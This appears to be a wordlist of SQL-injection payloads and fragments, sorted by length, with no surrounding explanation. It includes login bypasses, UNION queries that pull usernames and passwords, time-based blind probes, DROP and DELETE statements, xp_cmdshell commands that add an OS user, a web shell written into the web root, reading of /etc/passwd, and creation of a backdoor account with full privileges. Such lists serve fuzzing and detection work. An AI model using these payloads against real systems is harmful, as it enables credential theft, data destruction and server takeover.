" <=",
"1=1",
"' =",
"= =",
"= <",
"\" =",
" >=",
"' <>",
"' or",
"\" or",
"' >=",
"/**/",
"' ||",
"' <=",
"\" <>",
"= or",
"\" ||",
"= ||",
"' sum",
"' max",
"union",
"' min",
"'; USE",
"' from",
"' avg ",
"'; WITH",
"'; EXEC",
"'; DROP",
"'; CALL",
"' round ",
"' select",
"exec xp_",
"' OR 1=1",
"pg_sleep",
"'; SELECT",
"'; INSERT",
"@@version",
"1' OR 1=1",
"true=true",
"'; CREATE",
"admin' --",
"load_file",
"shell.php",
"EXEC(@cmd)",
"BENCHMARK(",
"' convert(",
"drop table",
"mysql.user",
"'; DECLARE",
"' OR 1=1 --",
"/etc/passwd",
"CREATE USER",
"admin' /**/",
"select from",
"delete from",
"\" OR \"1\"=\"1",
"' OR 'a'='a",
"' or 'a'='a",
"xp_cmdshell",
"' || 1=1 --",
"alter table",
"' OR 'x'='x",
"'%admin%' --",
"INTO OUTFILE",
"lambda_async",
"1' or 1=1 --",
"1' OR '1'='1",
"1' or '1'='1",
"union select",
"FROM users --",
"-- /* test */",
"ysql.user; --",
"WAITFOR DELAY",
"1' or true --",
"hema.tables --",
"from users) --",
"ABLE users; --",
"' HAVING 1=1 #",
"P(5) AND '1'='1",
"word FROM users",
"password='pass'",
"E admin_login--",
"DROP TABLE temp",
"DROP TABLE users",
"FROM users; /**/",
"LOAD DATA INFILE",
"T pg_sleep(5); --",
"LECT @@version --",
"DELETE FROM users",
"'1' GROUP BY 1 --",
"1,2 FROM users --",
"T(*) FROM users --",
"LECT @@version) --",
"word FROM users --",
"NION SELECT 1,2 --",
"information_schema",
"SELECT pg_sleep(5)",
"CT * FROM users --",
"ct * from users) --",
"FROM mysql.user; --",
"' OR 1=1 LIMIT 1 --",
"password FROM users",
"'''; EXEC(@cmd); --",
"logs VALUES('hack')",
"SELECT @@version --",
"DROP TABLE temp; --",
"LECT pg_sleep(5); --",
"INTO TABLE users; --",
"TFOR DELAY '0:0:5'--",
"GRANT ALL PRIVILEGES",
"hema FROM tables; --",
"NION SELECT 1,2,3 --",
"LETE FROM users; /**/",
"ll 'ping 127.0.0.1'--",
"' or 1 = 1 LIMIT 1 --",
"DROP DATABASE temp --",
"USE information_schema",
"password FROM users --",
"'; SELECT @@version --",
"SELECT * FROM users --",
"name LIKE '%admin%' --",
"LECT COUNT(*),1) a) --",
"WAITFOR DELAY '0:0:5'--",
"word FROM users /**/ /*",
"' OR '1'='1' UNION SELEC",
"'; DROP DATABASE temp --",
"CT * FROM mysql.user; --",
"SELECT * FROM mysql.user",
"sers SET password='pass'",
"1=1; DROP TABLE temp; --",
"' OR username LIKE '%adm",
"' OR 1=1; DROP TABLE tem",
"' OR 1=1; INSERT INTO lo",
"' OR 1 IN (SELECT @@vers",
"='1' UNION SELECT 1,2 --",
"1' OR 1=1; SELECT * FROM",
"' OR SLEEP(5) AND '1'='1",
"IN (SELECT @@version) --",
"1' OR '1' = '1' GROUP BY",
"' or 1=1 in (select * fr",
"' INTO OUTFILE '/var/www",
"ROW SET NEW.admin = 1; --",
"ABLE users; -- /* test */",
"1=0 UNION SELECT 1,2,3 --",
"' AND 1=0 UNION SELECT ta",
"' AND (SELECT 1 FROM (SEL",
"' AND 1=0 UNION SELECT 1,",
"'; INSERT INTO users VALU",
"'; SELECT pg_sleep(5); --",
"swd' INTO TABLE users; --",
"'; DROP TABLE users; -- /*",
"'; EXEC sp_configure 'show",
"USE information_schema; SE",
"'; DELETE FROM users; /**/",
"' INTO OUTFILE '/var/www/s",
"DECLARE @cmd VARCHAR(4000)",
"OR 1 IN (SELECT @@version)",
"'; WAITFOR DELAY '0:0:5'--",
"1=1 in (select * from user",
"'; EXEC xp_cmdshell('net us",
"DATA INFILE '/etc/passwd' I",
"'; EXEC master..xp_cmdshell",
"LECT COUNT(*) FROM users --",
"1=1; INSERT INTO logs VALUE",
"sers INTO OUTFILE '/tmp/dum",
"'; LOAD DATA INFILE '/etc/p",
"M information_schema.tables",
"' UNION SELECT username, pa",
"1=1; SELECT * FROM users --",
"password FROM users /**/ /*",
"FORE INSERT ON users FOR EA",
"' UNION ALL SELECT username",
"in (select * from users) --",
"FROM information_schema.tab",
"E information_schema; SELEC",
"'; DROP PROCEDURE admin_log",
"r BEFORE INSERT ON users FO",
"' UNION SELECT * FROM infor",
"' UNION ALL SELECT 1,2 FROM",
"'; SELECT * FROM mysql.user;",
"LECT username, password FROM",
"CT * FROM users INTO OUTFILE",
"sers VALUES ('hack', 'hack')",
"' OR username LIKE '%admin%'",
"a+1 FROM REC WHERE a<100) SE",
"00); SET @cmd = 'xp_cmdshell",
"DROP PROCEDURE admin_login--",
"ALL SELECT 1,2 FROM users --",
"'; ALTER TABLE users ADD col",
"000) SET @s=CAST(0x73 AS VAR",
"me,2 FROM information_schema.",
"1=0 UNION SELECT table_name,2",
"'; SELECT load_file('/etc/pas",
"ABLE users ADD column VARCHAR",
"'; SELECT COUNT(*) FROM users",
"'; UPDATE users SET password=",
"'; SELECT MD5(BENCHMARK(10000",
"FROM users INTO OUTFILE '/tmp",
"'; CREATE USER 'hack'@'%' IDE",
"' OR 1=1; DROP TABLE temp; --",
"'net user hack hack /add'); -",
"'; INSERT INTO users VALUES (",
"SELECT COUNT(*) FROM users --",
"sers INTO OUTFILE '/tmp/dump.",
"1 a UNION ALL SELECT a+1 FROM",
"CT 1 FROM (SELECT COUNT(*),1)",
"REC WHERE a<100) SELECT * FRO",
"'; SELECT * FROM users INTO O",
"CT * FROM information_schema.",
"LECT load_file('/etc/passwd')",
"1' OR '1' = '1' GROUP BY 1 --",
"ALL SELECT username, password",
"INTO users VALUES ('hack', 'h",
"'; CREATE TRIGGER malicious_t",
"SERT INTO users VALUES ('hack",
"SERT INTO logs VALUES('hack')",
"DATE users SET password='pass",
"EATE USER 'hack'@'%' IDENTIFI",
"T ON users FOR EACH ROW SET N",
"LTER TABLE users ADD column VA",
"'; DECLARE @s VARCHAR(4000) SE",
"'; DECLARE @cmd VARCHAR(4000);",
"LECT table_name,2 FROM informa",
"DROP TABLE users; -- /* test *",
"NION SELECT username, password",
"LECT table_schema FROM tables;",
"AS (SELECT 1 a UNION ALL SELEC",
"AND (SELECT 1 FROM (SELECT COUN",
"SELECT load_file('/etc/passwd')",
"1=1; INSERT INTO logs VALUES('h",
"'; SELECT * FROM mysql.user; --",
"FORE INSERT ON users FOR EACH R",
"NION SELECT table_name,2 FROM i",
"' AND 1=0 UNION SELECT 1,2,3 --",
"SELECT table_schema FROM tables",
"' OR username LIKE '%admin%' --",
"'; DROP PROCEDURE admin_login--",
"' OR 1 IN (SELECT @@version) --",
"INSERT INTO logs VALUES('hack')",
"ema; SELECT table_schema FROM t",
"NION SELECT * FROM information_",
"INTO OUTFILE '/var/www/shell.php",
"EATE TRIGGER malicious_trigger B",
"'; SELECT COUNT(*) FROM users --",
"MD5(BENCHMARK(100000,MD5('x')));",
"' OR '1'='1' UNION SELECT 1,2 --",
"SET @cmd = 'xp_cmdshell ''dir'''",
"UPDATE users SET password='pass'",
"LECT load_file('/etc/passwd'); #",
"INTO OUTFILE '/tmp/dump.txt'; --",
"FROM information_schema.tables --",
"1' OR 1=1; SELECT * FROM users --",
"ALL PRIVILEGES ON *.* TO 'hack'@'%",
"'; DROP TABLE users; -- /* test */",
"ter..xp_cmdshell 'ping 127.0.0.1'--",
"'; UPDATE users SET password='pass'",
"' or 1=1 in (select * from users) --",
"d = 'xp_cmdshell ''dir'''; EXEC(@cmd",
"' UNION ALL SELECT 1,2 FROM users --",
"EXEC xp_cmdshell('net user hack hack",
"ysql.lambda_async('127.0.0.1', 1234,",
"'; SELECT load_file('/etc/passwd'); #",
"SELECT MD5(BENCHMARK(100000,MD5('x')))",
"' INTO OUTFILE '/var/www/shell.php' --",
"GRANT ALL PRIVILEGES ON *.* TO 'hack'@'%'",
"' OR 1=1; INSERT INTO logs VALUES('hack')",
"ALTER TABLE users ADD column VARCHAR(255)",
"INSERT INTO users VALUES ('hack', 'hack')",
"USE information_schema; SELECT table_schem",
"EXEC xp_cmdshell('net user hack hack /add')",
"CREATE USER 'hack'@'%' IDENTIFIED BY 'hack'",
"EXEC master..xp_cmdshell 'ping 127.0.0.1'--",
"EXEC sp_configure 'show advanced options', 1",
"'; INSERT INTO users VALUES ('hack', 'hack')",
"'; ALTER TABLE users ADD column VARCHAR(255)",
"'; SELECT MD5(BENCHMARK(100000,MD5('x'))); --",
"'; EXEC master..xp_cmdshell 'ping 127.0.0.1'--",
"' AND (SELECT 1 FROM (SELECT COUNT(*),1) a) --",
"LOAD DATA INFILE '/etc/passwd' INTO TABLE users",
"' UNION SELECT username, password FROM users --",
"' UNION ALL SELECT username, password FROM users",
"SELECT * FROM users INTO OUTFILE '/tmp/dump.txt'",
"' UNION SELECT * FROM information_schema.tables --",
"'; EXEC xp_cmdshell('net user hack hack /add'); --",
"CALL mysql.lambda_async('127.0.0.1', 1234, 'shell')",
"'; EXEC sp_configure 'show advanced options', 1; --",
"' UNION SELECT username, password FROM users /**/ /*",
"'; LOAD DATA INFILE '/etc/passwd' INTO TABLE users; --",
"'; SELECT * FROM users INTO OUTFILE '/tmp/dump.txt'; --",
"'; CALL mysql.lambda_async('127.0.0.1', 1234, 'shell'); --",
"'; USE information_schema; SELECT table_schema FROM tables; --",
"DECLARE @s VARCHAR(4000) SET @s=CAST(0x73 AS VARCHAR(4000)) --",
"'; DECLARE @s VARCHAR(4000) SET @s=CAST(0x73 AS VARCHAR(4000)) --",
"' AND 1=0 UNION SELECT table_name,2 FROM information_schema.tables --",
"'; DECLARE @cmd VARCHAR(4000); SET @cmd = 'xp_cmdshell ''dir'''; EXEC(@cmd); --",
"WITH REC AS (SELECT 1 a UNION ALL SELECT a+1 FROM REC WHERE a<100) SELECT * FROM REC",
"CREATE TRIGGER malicious_trigger BEFORE INSERT ON users FOR EACH ROW SET NEW.admin = 1",
"'; WITH REC AS (SELECT 1 a UNION ALL SELECT a+1 FROM REC WHERE a<100) SELECT * FROM REC; --",
"'; CREATE USER 'hack'@'%' IDENTIFIED BY 'hack'; GRANT ALL PRIVILEGES ON *.* TO 'hack'@'%'; --",
"'; CREATE TRIGGER malicious_trigger BEFORE INSERT ON users FOR EACH ROW SET NEW.admin = 1; --",
